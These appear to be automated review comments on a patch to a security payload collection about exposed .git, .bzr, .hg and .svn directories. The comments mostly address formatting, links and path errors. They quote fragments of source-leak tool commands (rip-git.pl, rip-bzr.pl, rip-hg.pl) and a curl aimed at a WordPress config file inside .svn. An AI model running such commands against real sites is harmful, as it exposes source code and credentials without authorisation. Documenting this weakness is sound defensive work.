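Review bot: In `Insecure Randomness/README.md`, the added Multi-sandwich entry has no language marker although the two sibling entries by the same author were just given trailing `*(FR)*` and `*(EN)*` tags. Add `*(EN)*` to it or drop the markers from all three. The hunk's context line still reads `sandwitch attack`; since the references spell it `Sandwich Attack`, fixing that text in the same change would keep the page consistent.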
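Review bot: In the new `Insecure Source Code Management/Bazaar.md`, the `rip-bzr.pl` command ends with `-v -u` and no URL value, so it cannot be run as written. Add a placeholder URL after `-u`, as the `rip-git.pl -v -u "http://web.site/.git/"` line in `Git.md` does. Both blocks are fenced as `powershell` although they hold `wget`, `docker` and `bzr` shell commands, and the `bzr_dumper` block mixes commands with tool output where only `$ bzr revert` carries a prompt marker; a shell fence and a consistent prompt would make it clear which lines are typed.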
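Review bot: In the new `Insecure Source Code Management/Git.md`, the Summary ends with `* [Refererences]`, which is misspelled and has no link target; it should read `* [References](#references)`. The Summary also lists Automatic recovery and Harvesting secrets as top-level entries although both are `###` sections under `## Tools`, so they should be nested under the Tools item. Since the walkthrough is being moved anyway, the carried-over path errors are worth fixing in this change: the steps run `mkdir .git/object/26` and then move the file into `.git/objects/26/`, and step 5 creates a `cb` directory but moves the blob into `.git/objects/32/`.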
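Review bot: In the new `Insecure Source Code Management/Mercurial.md`, the `rip-hg.pl -v -u` command has no URL after `-u`, and the `wget` line that fetched the script in the removed README section is gone without the replacement text saying the container already ships it. The References list here uses a `*` bullet and the date `Feb 13, 2023`, while the rest of this patch converts reference bullets to `-` and spells months out.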
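Review bot: In `Insecure Source Code Management/README.md`, the NGINX snippet in the new Methodology section is fenced as `ps1`; it should be `nginx`. The text around it also needs one more sentence: `location /.git { deny all; }` is a prefix match, so it denies files under `/.git/` as well as the listing, yet the paragraph that follows reads as if this rule left the files readable. State explicitly that the case meant is a server that blocks only the directory listing, and consider showing `return 404;` as the form that does not confirm the directory exists. The one remaining reference also drops the author (`bl4de`) that the removed entry carried, while other entries in this patch follow title, author, date.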
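Review bot: In the new `Insecure Source Code Management/Subversion.md`, the `## Examples` section opens with a bare `curl` against `.svn/text-base/wp-config.php.svn-base` and then switches to numbered steps built on `.svn/wc.db` and `.svn/pristine/`, with no text saying these are two different working-copy layouts. Add a one-line lead-in for each so readers know which one applies. Step 1's block shows an `INSERT INTO "NODES"` row rather than a command, so label it as a sample row from the downloaded database and fence it as `sql` instead of `powershell`.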